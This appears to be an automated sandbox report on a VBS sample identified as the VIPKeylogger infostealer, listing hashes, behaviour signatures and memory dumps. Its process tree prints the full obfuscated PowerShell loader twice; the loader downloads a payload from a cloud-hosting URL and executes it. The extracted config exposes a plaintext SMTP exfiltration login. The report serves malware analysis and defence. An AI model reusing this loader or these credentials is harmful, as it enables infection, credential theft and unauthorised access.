Overview

overview

10

Static

static

1

9ebf7ae41c...2a.vbs

windows7-x64

8

9ebf7ae41c...2a.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/11/2024, 04:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9ebf7ae41cdb079bda5c648a1511abb0cb72357d62566011fd463241a6edb62a.vbs

  • Size

    34KB

  • MD5

    a170d3802bb9947d9ed54d4b20208e4d

  • SHA1

    a03ba66fa635baba9244e1eac3f99b269f613635

  • SHA256

    9ebf7ae41cdb079bda5c648a1511abb0cb72357d62566011fd463241a6edb62a

  • SHA512

    9aa17a1eb72e3898c3298f130ebbdbe7354ca06dd6882336c86a83039150742b6e399e40a57c6bb2ea007b2a326cc742e2172987651b8e896aae34002185fbfc

  • SSDEEP

    192:ALwiULy4CrB+UhzT+cDWpvdGrlzNb6+HjUpDUShGY/eSQKLx0xTkow:aiy4qptDWponb69pD5hBmSmTI

Score
10/10
vipkeyloggercollectiondiscoveryexecutionkeyloggerstealer

Malware Config

Extracted

Credentials

  • Protocol:     smtp
  • Host:
    mail.singhalenterprise.com
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    balkishan@123

Extracted

Family

vipkeylogger

Credentials

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.

    stealerkeyloggervipkeylogger
  • Vipkeylogger family
    vipkeylogger
  • Blocklisted process makes network request 13 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9ebf7ae41cdb079bda5c648a1511abb0cb72357d62566011fd463241a6edb62a.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2072
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#sygejournalens Krna Monstrator #>;$Doodle='Offerceremonierne';<#adoptanternes Trsaltendes Antonines Stillesiddende Nazificeringen fortinner #>; function Shoppe($Chorai){If ($host.DebuggerEnabled) {$Fireplug++;}$Karkludes=$feltlazarets+$Chorai.'Length' - $Fireplug; for ( $Brassia=5;$Brassia -lt $Karkludes;$Brassia+=6){$Bumblepuppy=$Brassia;$Tvangsforflytninger+=$Chorai[$Brassia];}$Tvangsforflytninger;}function Jagtlejeren($Roughdry){ & ($Enknnede) ($Roughdry);}$Shoppingens95=Shoppe ' dygtMMacroo SolazTilbai BedrlMyrmalOmskiaFodb /Uau e ';$Kredset=Shoppe 'Repe.TDogmalIncorsPrunt1Recep2Thirt ';$Ejendomsoverdragelse='Mon,t[mulloN chymeexposT Be,i. orisSlumsE BemrrBloodvUddaniBefolc hondE DopppBl,usO mottIspildNS lskthjer m .iguASvinaNdr wbaShowdGKup eEF.sedRSagg.] Unch:Radia:UrateS StruEFraktc ssayuDebaurAfbeniBuffetAngrey S esPSea,hRCuseco CloztTerriosquamCEnameOAntndLQuasi= our$IndarKHotelr Ban EAtomidHarleSJumpsEArbejtBlaaj ';$Shoppingens95+=Shoppe 'Tumle5ampli.Benz,0 Akad Anth(HerskWCercoiHelhenUnrefd Po,do.fmejwBillesSoste Bank,NP,rtyT Scom Ozo,i1Sad,e0Tsard. Kons0 Coty;pyr x MonitW TegniIrritnHet r6dalto4Berna;Aga.e FattxTenor6 M sk4Forfi;Paten FnomergudsfvAntis: Kyik1vals 3 M ks1S.kse.Physi0Karto)Pa en greesG Sen eThalac Folkk mul oIsogo/Crini2Rundh0forst1Bolig0Tami,0Count1Forbi0Unami1Hoejd SardiFsulfoiTor,krDadele BiocfA buloUncryxYan,t/ Su,p1 Stil3Enhu,1,flbs.Udskr0 Uge ';$Ubiquious=Shoppe ' CoerU undeSDigitEKmninRKines-SalonASt rtgR curECompen.krifT Gene ';$Behftet=Shoppe ' Re ihHeld,tInrintOfrenpUnde sSilke:kodes/R.ves/PerimdCo,sprhyperi Airov U mneAmphi. orang VersoPla fo P,nsg ArvelPsitteRhodo.Dwa ic Proso ,ulimPhary/D leluDesfocDecid? CarneImdegxFor upM.ggeoBohrsrSydvet ater= DividRea doBarm w BenenDgovelFir.toK dniaTes.udbgerb& CrumiMat rd Om.r=moloc1 PreeCFir kPChangIAllindMimenoSysteAMavieAFraarU Sanc6 .issKKonvo_G nin_ W nkpAftennKrepieL.ndh7VoldsDbiartFSidelaForskmLrest9 Ba lmTempezGe.ti7UndriE .rem0Rudsk2S lvfH aes2Demo.cGar ex reciCNonsp ';$Aftestede=Shoppe 'Y,oma>dim o ';$Enknnede=Shoppe 'ProtoIVildteKapitx.kole ';$Berberi='Magtstillingernes';$navr='\Smykkestenens.Gel';Jagtlejeren (Shoppe ' ndle$BeggaGFor.mlClubiOMyeleBPr nya rekvlIsmae:IndvaA nderF Udnvg,irati Adv.FPrefiTTri,isKorreKMa leoUdd nn,solaT Dr.jrPreeno ytrlCoha SN ere=Kipuk$Sk,deELrerknPadloV ythi:HovmeAManitPMillePGibstdGangeaUnc,ntBusybAOptha+Phant$H,lognStepmaUnappV Querrquat ');Jagtlejeren (Shoppe 'lirum$R accGRep,iLTudkoOProtib NegraFo,mil Afsa:Show FC llsLCoregi urrepMiliepO ergEAddeeN AleiE Sand=Skovf$Se ulbDelinETilbuHSubtrFIndtrTVogneeBev,etAndan.OvertSDisemPVuregLMsketiRe.inT Non.(Unche$DessaAbeshefFizziT A beEForreSL njuTRadioE ubmdPrismEMicro)Demo, ');Jagtlejeren (Shoppe $Ejendomsoverdragelse);$Behftet=$Flippene[0];$Koderegistrets=(Shoppe 'Certi$BravugIndt.lDru,koBr dsB KnipaDatael Dvn :Ind,ouMus,sNBukstAudledcForsuTsceneolangtrVita.l A.tiIP nktkchilde.oesk= Fo bNTuriseOverowKapit- egnsoFlameBCabanJ Aarhe,aranCCr,cetTmme, AnacrS Da ly BiopSDugfaTh ardECal.oMTostr.HesteN kelpE ammeTcharl.Polytw My.iEVin.eBManusc CloaLUnalaiDynejeKost.NR bblT Car ');Jagtlejeren ($Koderegistrets);Jagtlejeren (Shoppe 'Blegf$LizarUBit en PyjaaSgelncTaffetDoohioInvesr SletlosciliBedirkLockbeBeqwe.Re.arHBetaee LiceaKaskadBr tte BestrShwa sMaste[Flukt$ U.tmU rellb CalyiudhamqKusk uUneati Brs.oServiu,loftsJe,ns] A mr= Typi$VdepsSMlxfohMun,eoSkalpp oplap UndeiHoft nBefu gKrydse La in,ordes Afsl9Abnor5 Fd v ');$magister=Shoppe 'Relik$TenniUVi,genSpragaSarruc Co.rtLos.eoRingmrN turls tyki Sk fkOut oeB kym.TerraDSke.toFru rwSporanSelvel BlokoimmunaO ruld FrisF Fn ki sladlAula eEumo,( Afko$NordsBViatoeRddikhNetmofklinttSub reQu.rlt Tilr,Ro ft$HeftnFDiagouFunktr EsuracigarnVendb)Ska r ';$Furan=$Afgiftskontrols;Jagtlejeren (Shoppe 'Evoca$Denneg SataLTran OLimbuBGenneAPlai lNonpu:VikarU TrklNKlo og Ab.tlCacopUZero,TPantei Opm nIskiaoInvi SfuellISyn,atAn enYHardd=Spars(KarusT DybdE ondesKolletI wra-Hurrop AfhoA InteT Re.rHOpaci Migra$ ligufudganu Sa.cRM nqua Str.nElkes)Rin e ');while (!$Unglutinosity) {Jagtlejeren (Shoppe 'Hatte$ErgomgRemsklKom aoSparkbVoiceaEfreelBista: pdyAethicn PeriaDef mpBombslE uipaBenumsDoerkmUnjus=Aspor$L,eprt PyrarkloakuSvampeSe,ne ') ;Jagtlejeren $magister;Jagtlejeren (Shoppe 'BssenSCarteT JohaAOv.reRBlindt.loms-FremgsTheatl P asEMyzoseAzimepBibli D mm4Kalmi ');Jagtlejeren (Shoppe 'Parti$SpeciG Branl econoD,vtyb Larraunpagl Hals:pass UKamufnS,lphgStutsLTrettu In stBrevsi De inLoranONy tesBombnI VituTPlig y Ta p= eger(Sko eTReci.eSkvisSGroupTStrmp-M rioP Fo dAHomoiT Uds hSyd.r ingb$Ta,ulFphacoUsiltaRAmaniADesavNMelle)Co an ') ;Jagtlejeren (Shoppe 'Heide$FdevagPengeLpooa oUngraBMorbia Sta,l humb:SouthgTeglleForpunFrogsi AnlgnKyathDFrakkFCalciRMaugheIdentlIslansSilkeEPostcNT.rgisUnder=Telef$t leaG SpdlLMateroMissiB K nkaBaithLVold.:HunknRAdvokAironiv Stame SkadlOpinilPronoI PosiN igtng re sS Myot+De pi+Morfo%Enemr$RamblfArchaL ForbIPraecpFer dPGerm.EOtidenEchi eUbe e.Frem cbr coOErhveUC,lisnHyo ctRepr ') ;$Behftet=$Flippene[$Genindfrelsens];}$Commensurately7=296173;$Ondogram=30694;Jagtlejeren (Shoppe 'Mobb $PartigVedlglAmbroOSoldaBBis,ea eltiLUsded:TordeEMa,shCSe,pwUKontoaop.avDCaucuo,esinRF lesIUdd nAForudnHendeE C itr Stive PelaNDi,yd Stra=Ve,mi MedalGPrecue TaagTK,mer-Leu,oC Adk oFinagNPreexTRig eeFuma n TriaTWasha Ab rd$RenseFKost,U lokrNei hAFlushnFoers ');Jagtlejeren (Shoppe 'amili$Rekurg Py nlBesn oStatub Upoha PreslArvem:PrognD Br eiHoldsa WambcDidieetr plt BerliUd,ngc ,phe .ntir=Stnkl Trip[R ferSChampy P trsFacl tUnmeleTheopm Undu. issiCH,orooNed tn Platv,rundeVejrfr Deutt Swim]Zamin: Natu:M rinFB.ardrForvaoFuldemPrcedBHedonaBu tjsapplieSnekr6Cleru4P aneSMyolotCosmor Sk,libenzinV vipgParap(Negat$SpegeEUnburcSwanhuDi.poaFind,dInveso Sarkr H,ppiCordoaUfejln FileeLandir alabe sti n Revi)Resub ');Jagtlejeren (Shoppe 'Blink$TelefGGambulStencoTyphoBSlaveaUdsgnLMiche: RaticEgg.nh TndeEGlotteGrunds Te eEAuntrcForsilagreaOUsigeTU whiH elda Ombud=Osteo Cell[Bac.eSFrlaaY dbansCelleT T edeFla.kMP ygr.CautiTNeu oER,tatxA.kidT obtu.A.greE Wig.nUphelCTyvero HuledBendiIFlerbN F.rmGNonal]Anti :Pitui:SlaviAWindssRuginc R stiUnproiTzar,.UndergMacroEtrafiT UnprSDac yTCosturPa.hlICashaNAnywhgPatta(tilli$Yn.igdNonreiAleura Fl.nc.igsoeNulretDa.peiAgtigCRes n)sving ');Jagtlejeren (Shoppe 'Psych$ redigDehy l AvenO TurbbIndflATittulKlave:LagenhSkytlo Pricm .rudi Rulln WroniFormua Dy dN Signs irke=Sygep$ Un iCSe.vbHReopee CreteVagn SSandgEIndepC UndeLKiannO MiratLapsuhRabel.BarbesTal nuhenribNon bSi,denTEarthrKnud.iS.pplnRelieGE.asm(Arn r$Ar ejc.usumOSma,fM Ta,eMVandrEPucklNGaranssi,deUEpikerAgronaVietntpaas,e srgeL Blony ystn7Salt,,Opbe $Betryo H linViburd Baadosvaleg TolsRthumbARundimSkild) coet ');Jagtlejeren $Hominians;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:212
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#sygejournalens Krna Monstrator #>;$Doodle='Offerceremonierne';<#adoptanternes Trsaltendes Antonines Stillesiddende Nazificeringen fortinner #>; function Shoppe($Chorai){If ($host.DebuggerEnabled) {$Fireplug++;}$Karkludes=$feltlazarets+$Chorai.'Length' - $Fireplug; for ( $Brassia=5;$Brassia -lt $Karkludes;$Brassia+=6){$Bumblepuppy=$Brassia;$Tvangsforflytninger+=$Chorai[$Brassia];}$Tvangsforflytninger;}function Jagtlejeren($Roughdry){ & ($Enknnede) ($Roughdry);}$Shoppingens95=Shoppe ' dygtMMacroo SolazTilbai BedrlMyrmalOmskiaFodb /Uau e ';$Kredset=Shoppe 'Repe.TDogmalIncorsPrunt1Recep2Thirt ';$Ejendomsoverdragelse='Mon,t[mulloN chymeexposT Be,i. orisSlumsE BemrrBloodvUddaniBefolc hondE DopppBl,usO mottIspildNS lskthjer m .iguASvinaNdr wbaShowdGKup eEF.sedRSagg.] Unch:Radia:UrateS StruEFraktc ssayuDebaurAfbeniBuffetAngrey S esPSea,hRCuseco CloztTerriosquamCEnameOAntndLQuasi= our$IndarKHotelr Ban EAtomidHarleSJumpsEArbejtBlaaj ';$Shoppingens95+=Shoppe 'Tumle5ampli.Benz,0 Akad Anth(HerskWCercoiHelhenUnrefd Po,do.fmejwBillesSoste Bank,NP,rtyT Scom Ozo,i1Sad,e0Tsard. Kons0 Coty;pyr x MonitW TegniIrritnHet r6dalto4Berna;Aga.e FattxTenor6 M sk4Forfi;Paten FnomergudsfvAntis: Kyik1vals 3 M ks1S.kse.Physi0Karto)Pa en greesG Sen eThalac Folkk mul oIsogo/Crini2Rundh0forst1Bolig0Tami,0Count1Forbi0Unami1Hoejd SardiFsulfoiTor,krDadele BiocfA buloUncryxYan,t/ Su,p1 Stil3Enhu,1,flbs.Udskr0 Uge ';$Ubiquious=Shoppe ' CoerU undeSDigitEKmninRKines-SalonASt rtgR curECompen.krifT Gene ';$Behftet=Shoppe ' Re ihHeld,tInrintOfrenpUnde sSilke:kodes/R.ves/PerimdCo,sprhyperi Airov U mneAmphi. orang VersoPla fo P,nsg ArvelPsitteRhodo.Dwa ic Proso ,ulimPhary/D leluDesfocDecid? CarneImdegxFor upM.ggeoBohrsrSydvet ater= DividRea doBarm w BenenDgovelFir.toK dniaTes.udbgerb& CrumiMat rd Om.r=moloc1 PreeCFir kPChangIAllindMimenoSysteAMavieAFraarU Sanc6 .issKKonvo_G nin_ W nkpAftennKrepieL.ndh7VoldsDbiartFSidelaForskmLrest9 Ba lmTempezGe.ti7UndriE .rem0Rudsk2S lvfH aes2Demo.cGar ex reciCNonsp ';$Aftestede=Shoppe 'Y,oma>dim o ';$Enknnede=Shoppe 'ProtoIVildteKapitx.kole ';$Berberi='Magtstillingernes';$navr='\Smykkestenens.Gel';Jagtlejeren (Shoppe ' ndle$BeggaGFor.mlClubiOMyeleBPr nya rekvlIsmae:IndvaA nderF Udnvg,irati Adv.FPrefiTTri,isKorreKMa leoUdd nn,solaT Dr.jrPreeno ytrlCoha SN ere=Kipuk$Sk,deELrerknPadloV ythi:HovmeAManitPMillePGibstdGangeaUnc,ntBusybAOptha+Phant$H,lognStepmaUnappV Querrquat ');Jagtlejeren (Shoppe 'lirum$R accGRep,iLTudkoOProtib NegraFo,mil Afsa:Show FC llsLCoregi urrepMiliepO ergEAddeeN AleiE Sand=Skovf$Se ulbDelinETilbuHSubtrFIndtrTVogneeBev,etAndan.OvertSDisemPVuregLMsketiRe.inT Non.(Unche$DessaAbeshefFizziT A beEForreSL njuTRadioE ubmdPrismEMicro)Demo, ');Jagtlejeren (Shoppe $Ejendomsoverdragelse);$Behftet=$Flippene[0];$Koderegistrets=(Shoppe 'Certi$BravugIndt.lDru,koBr dsB KnipaDatael Dvn :Ind,ouMus,sNBukstAudledcForsuTsceneolangtrVita.l A.tiIP nktkchilde.oesk= Fo bNTuriseOverowKapit- egnsoFlameBCabanJ Aarhe,aranCCr,cetTmme, AnacrS Da ly BiopSDugfaTh ardECal.oMTostr.HesteN kelpE ammeTcharl.Polytw My.iEVin.eBManusc CloaLUnalaiDynejeKost.NR bblT Car ');Jagtlejeren ($Koderegistrets);Jagtlejeren (Shoppe 'Blegf$LizarUBit en PyjaaSgelncTaffetDoohioInvesr SletlosciliBedirkLockbeBeqwe.Re.arHBetaee LiceaKaskadBr tte BestrShwa sMaste[Flukt$ U.tmU rellb CalyiudhamqKusk uUneati Brs.oServiu,loftsJe,ns] A mr= Typi$VdepsSMlxfohMun,eoSkalpp oplap UndeiHoft nBefu gKrydse La in,ordes Afsl9Abnor5 Fd v ');$magister=Shoppe 'Relik$TenniUVi,genSpragaSarruc Co.rtLos.eoRingmrN turls tyki Sk fkOut oeB kym.TerraDSke.toFru rwSporanSelvel BlokoimmunaO ruld FrisF Fn ki sladlAula eEumo,( Afko$NordsBViatoeRddikhNetmofklinttSub reQu.rlt Tilr,Ro ft$HeftnFDiagouFunktr EsuracigarnVendb)Ska r ';$Furan=$Afgiftskontrols;Jagtlejeren (Shoppe 'Evoca$Denneg SataLTran OLimbuBGenneAPlai lNonpu:VikarU TrklNKlo og Ab.tlCacopUZero,TPantei Opm nIskiaoInvi SfuellISyn,atAn enYHardd=Spars(KarusT DybdE ondesKolletI wra-Hurrop AfhoA InteT Re.rHOpaci Migra$ ligufudganu Sa.cRM nqua Str.nElkes)Rin e ');while (!$Unglutinosity) {Jagtlejeren (Shoppe 'Hatte$ErgomgRemsklKom aoSparkbVoiceaEfreelBista: pdyAethicn PeriaDef mpBombslE uipaBenumsDoerkmUnjus=Aspor$L,eprt PyrarkloakuSvampeSe,ne ') ;Jagtlejeren $magister;Jagtlejeren (Shoppe 'BssenSCarteT JohaAOv.reRBlindt.loms-FremgsTheatl P asEMyzoseAzimepBibli D mm4Kalmi ');Jagtlejeren (Shoppe 'Parti$SpeciG Branl econoD,vtyb Larraunpagl Hals:pass UKamufnS,lphgStutsLTrettu In stBrevsi De inLoranONy tesBombnI VituTPlig y Ta p= eger(Sko eTReci.eSkvisSGroupTStrmp-M rioP Fo dAHomoiT Uds hSyd.r ingb$Ta,ulFphacoUsiltaRAmaniADesavNMelle)Co an ') ;Jagtlejeren (Shoppe 'Heide$FdevagPengeLpooa oUngraBMorbia Sta,l humb:SouthgTeglleForpunFrogsi AnlgnKyathDFrakkFCalciRMaugheIdentlIslansSilkeEPostcNT.rgisUnder=Telef$t leaG SpdlLMateroMissiB K nkaBaithLVold.:HunknRAdvokAironiv Stame SkadlOpinilPronoI PosiN igtng re sS Myot+De pi+Morfo%Enemr$RamblfArchaL ForbIPraecpFer dPGerm.EOtidenEchi eUbe e.Frem cbr coOErhveUC,lisnHyo ctRepr ') ;$Behftet=$Flippene[$Genindfrelsens];}$Commensurately7=296173;$Ondogram=30694;Jagtlejeren (Shoppe 'Mobb $PartigVedlglAmbroOSoldaBBis,ea eltiLUsded:TordeEMa,shCSe,pwUKontoaop.avDCaucuo,esinRF lesIUdd nAForudnHendeE C itr Stive PelaNDi,yd Stra=Ve,mi MedalGPrecue TaagTK,mer-Leu,oC Adk oFinagNPreexTRig eeFuma n TriaTWasha Ab rd$RenseFKost,U lokrNei hAFlushnFoers ');Jagtlejeren (Shoppe 'amili$Rekurg Py nlBesn oStatub Upoha PreslArvem:PrognD Br eiHoldsa WambcDidieetr plt BerliUd,ngc ,phe .ntir=Stnkl Trip[R ferSChampy P trsFacl tUnmeleTheopm Undu. issiCH,orooNed tn Platv,rundeVejrfr Deutt Swim]Zamin: Natu:M rinFB.ardrForvaoFuldemPrcedBHedonaBu tjsapplieSnekr6Cleru4P aneSMyolotCosmor Sk,libenzinV vipgParap(Negat$SpegeEUnburcSwanhuDi.poaFind,dInveso Sarkr H,ppiCordoaUfejln FileeLandir alabe sti n Revi)Resub ');Jagtlejeren (Shoppe 'Blink$TelefGGambulStencoTyphoBSlaveaUdsgnLMiche: RaticEgg.nh TndeEGlotteGrunds Te eEAuntrcForsilagreaOUsigeTU whiH elda Ombud=Osteo Cell[Bac.eSFrlaaY dbansCelleT T edeFla.kMP ygr.CautiTNeu oER,tatxA.kidT obtu.A.greE Wig.nUphelCTyvero HuledBendiIFlerbN F.rmGNonal]Anti :Pitui:SlaviAWindssRuginc R stiUnproiTzar,.UndergMacroEtrafiT UnprSDac yTCosturPa.hlICashaNAnywhgPatta(tilli$Yn.igdNonreiAleura Fl.nc.igsoeNulretDa.peiAgtigCRes n)sving ');Jagtlejeren (Shoppe 'Psych$ redigDehy l AvenO TurbbIndflATittulKlave:LagenhSkytlo Pricm .rudi Rulln WroniFormua Dy dN Signs irke=Sygep$ Un iCSe.vbHReopee CreteVagn SSandgEIndepC UndeLKiannO MiratLapsuhRabel.BarbesTal nuhenribNon bSi,denTEarthrKnud.iS.pplnRelieGE.asm(Arn r$Ar ejc.usumOSma,fM Ta,eMVandrEPucklNGaranssi,deUEpikerAgronaVietntpaas,e srgeL Blony ystn7Salt,,Opbe $Betryo H linViburd Baadosvaleg TolsRthumbARundimSkild) coet ');Jagtlejeren $Hominians;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4024
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Accesses Microsoft Outlook profiles
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:3036

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    71444def27770d9071039d005d0323b7

    SHA1

    cef8654e95495786ac9347494f4417819373427e

    SHA256

    8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9

    SHA512

    a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gpot3usu.qem.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Smykkestenens.Gel
    Filesize

    425KB

    MD5

    8ee76091cd18878654efdc3490b0e3ed

    SHA1

    61f11fcb53c9e9aa3768e17d96a052c152b3185e

    SHA256

    5f5ad73c9e7449ad2fd12957a86b1954b9a43c736e9b0171fe6d3081f5513630

    SHA512

    04b4e8ae360cf3c6d6f93a7f65a5db2a638eedc0f88d6688d329cbd7d39191c7aec398f2d467ececc14ebe78f5705b738103efb51940a8b39ebddc497d69471d

    Download Submit

  • memory/212-24-0x00007FF9291E0000-0x00007FF929CA1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/212-14-0x000001AFFF800000-0x000001AFFF822000-memory.dmp

    Filesize

    136KB

    Download

  • memory/212-18-0x00007FF9291E3000-0x00007FF9291E5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/212-19-0x00007FF9291E0000-0x00007FF929CA1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/212-21-0x00007FF9291E0000-0x00007FF929CA1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/212-15-0x00007FF9291E0000-0x00007FF929CA1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/212-4-0x00007FF9291E3000-0x00007FF9291E5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/212-16-0x00007FF9291E0000-0x00007FF929CA1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3036-71-0x0000000024470000-0x0000000024502000-memory.dmp

    Filesize

    584KB

    Download

  • memory/3036-67-0x0000000023B40000-0x0000000023B90000-memory.dmp

    Filesize

    320KB

    Download

  • memory/3036-66-0x00000000242A0000-0x0000000024462000-memory.dmp

    Filesize

    1.8MB

    Download

  • memory/3036-64-0x0000000023690000-0x000000002372C000-memory.dmp

    Filesize

    624KB

    Download

  • memory/3036-68-0x00000000249A0000-0x0000000024ECC000-memory.dmp

    Filesize

    5.2MB

    Download

  • memory/3036-72-0x0000000021180000-0x000000002118A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/3036-63-0x0000000000D80000-0x0000000000DCA000-memory.dmp

    Filesize

    296KB

    Download

  • memory/3036-62-0x0000000000D80000-0x0000000001FD4000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/4024-41-0x0000000005C70000-0x0000000005C8E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/4024-45-0x0000000006EE0000-0x0000000006F76000-memory.dmp

    Filesize

    600KB

    Download

  • memory/4024-46-0x0000000006E80000-0x0000000006EA2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4024-47-0x00000000080D0000-0x0000000008674000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/4024-44-0x0000000006DC0000-0x0000000006DDA000-memory.dmp

    Filesize

    104KB

    Download

  • memory/4024-49-0x0000000008680000-0x000000000BEB1000-memory.dmp

    Filesize

    56.2MB

    Download

  • memory/4024-43-0x00000000074A0000-0x0000000007B1A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/4024-42-0x0000000005CA0000-0x0000000005CEC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/4024-39-0x0000000005640000-0x0000000005994000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/4024-29-0x0000000005590000-0x00000000055F6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4024-28-0x0000000004E40000-0x0000000004EA6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4024-27-0x0000000004DA0000-0x0000000004DC2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4024-26-0x0000000004F60000-0x0000000005588000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/4024-25-0x0000000000B40000-0x0000000000B76000-memory.dmp

    Filesize

    216KB

    Download